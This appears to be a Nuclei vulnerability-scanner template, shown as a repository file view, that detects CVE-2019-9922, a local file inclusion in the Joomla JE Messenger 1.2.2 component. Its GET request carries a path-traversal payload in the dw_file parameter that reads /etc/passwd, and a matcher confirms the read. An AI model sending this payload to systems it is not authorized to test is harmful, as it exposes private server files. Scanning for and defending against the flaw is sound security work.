nuclei-templates/http/cves/2019/CVE-2019-9922.yaml

38 lines
1.1 KiB
YAML
Raw Normal View History

2022-07-10 22:31:44 +00:00
id: CVE-2019-9922
2022-07-10 22:31:44 +00:00
info:
name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion
2022-07-10 22:31:44 +00:00
author: 0x_Akoko
severity: high
description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.
2022-07-10 22:31:44 +00:00
reference:
- https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
- https://extensions.joomla.org/extension/je-messenger/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9922
2022-07-10 22:31:44 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-07-10 22:31:44 +00:00
cvss-score: 7.5
cve-id: CVE-2019-9922
cwe-id: CWE-22
cpe: cpe:2.3:a:harmistechnology:je_messenger:*:*:*:*:*:*:*:*
epss-score: 0.0145
2022-07-10 22:31:44 +00:00
tags: cve,cve2019,joomla,messenger,lfi
metadata:
max-request: 1
2022-07-10 22:31:44 +00:00
http:
2022-07-10 22:31:44 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200